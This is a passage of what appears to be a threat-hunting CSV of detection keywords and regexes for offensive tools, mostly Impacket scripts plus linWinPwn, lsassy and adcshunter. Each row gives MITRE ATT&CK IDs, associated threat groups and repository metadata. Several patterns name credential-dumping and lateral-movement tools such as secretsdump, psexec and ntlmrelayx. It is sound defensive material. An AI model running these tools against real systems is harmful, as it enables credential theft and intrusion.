Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48282" "*impacket__init__*",".{0,1000}impacket__init__.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48283" "*impacket_findDelegation*",".{0,1000}impacket_findDelegation.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","48284" "*impacket_rpcdump_output_*",".{0,1000}impacket_rpcdump_output_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","48285" "*impacket-atexec*",".{0,1000}impacket\-atexec.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48286" "*impacket-dcomexec*",".{0,1000}impacket\-dcomexec.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48287" "*impacketfile.py*",".{0,1000}impacketfile\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","48288" "*impacket-GetADUsers*",".{0,1000}impacket\-GetADUsers.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48289" "*impacket-GetNPUsers*",".{0,1000}impacket\-GetNPUsers.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48290" "*impacket-getST*",".{0,1000}impacket\-getST.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48291" "*impacket-getTGT*",".{0,1000}impacket\-getTGT.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48292" "*impacketldap_shell*",".{0,1000}impacketldap_shell.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48293" "*impacketlogger*",".{0,1000}impacketlogger.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48294" "*impacket-lookupsid*",".{0,1000}impacket\-lookupsid.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48295" "*impacketmssqlshell*",".{0,1000}impacketmssqlshell.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48296" "*impacket-netview*",".{0,1000}impacket\-netview.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48297" "*impacketntlmrelayx*",".{0,1000}impacketntlmrelayx.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48298" "*impacketos_ident*",".{0,1000}impacketos_ident.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48299" "*impacket-psexec*",".{0,1000}impacket\-psexec.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48300" "*impacket-reg*",".{0,1000}impacket\-reg.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48301" "*impacket-reg*",".{0,1000}impacket\-reg.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch. as well as parsed from raw data. and the object oriented API makes it simple to work with deep hierarchies of protocols. 
The library provides a set of tools as examples of what can be done within the context of this library","T1071.001 - T1071.002 - T1071.004 - T1071.005 ","TA0005 - TA0006","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","1","N/A","N/A","N/A","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48302" "*impacketremcomsvc*",".{0,1000}impacketremcomsvc.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48303" "*impacketrpcdatabase*",".{0,1000}impacketrpcdatabase.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48304" "*impacket-rpcdump*",".{0,1000}impacket\-rpcdump.{0,1000}","offensive_tool_keyword","adcshunter","Uses rpcdump to locate the ADCS server and identify if ESC8 is vulnerable from unauthenticated perspective.","T1018 - T1087 - T1046 - T1201 - T1595","TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/danti1988/adcshunter","1","0","N/A","N/A","7","1","80","7","2024-09-13T12:50:50Z","2023-12-14T14:31:05Z","48305" "*impacket-rpcdump*",".{0,1000}impacket\-rpcdump.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48306" "*impacket-samrdump*",".{0,1000}impacket\-samrdump.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48307" "*impacketsecretsdump*",".{0,1000}impacketsecretsdump.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48308" "*impacket-secretsdump*",".{0,1000}impacket\-secretsdump.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","48309" "*impacket-secretsdump*",".{0,1000}impacket\-secretsdump.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48310" "*impacketserviceinstall*",".{0,1000}impacketserviceinstall.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48311" "*impacket-services*",".{0,1000}impacket\-services.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48312" "*impacketsmbclient*",".{0,1000}impacketsmbclient.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on 